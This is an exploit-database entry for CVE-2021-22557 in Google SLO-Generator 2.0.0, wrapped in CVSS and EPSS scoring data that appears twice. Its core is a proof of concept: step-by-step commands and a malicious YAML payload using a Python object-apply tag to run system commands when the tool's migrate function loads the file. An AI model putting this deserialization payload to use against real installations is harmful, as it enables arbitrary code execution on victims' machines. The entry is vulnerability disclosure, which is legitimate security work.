CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS
Percentile
30.7%
# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557
##############################################################################
*Introduction*:
Is a tool to compute and export Service Level Objectives (SLOs), Error
Budgets and Burn Rates, using configurations written in YAML (or JSON)
format.
##############################################################################
*POC:*
1. pip3 install slo-generator==2.0.0
2. 2. Save the below yaml code in a file as exploit.yaml.
!!python/object/apply:os.system ["id;whoami"]
3. Run the below command
slo-generator migrate -b exploit.yaml
##############################################################################
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS
Percentile
30.7%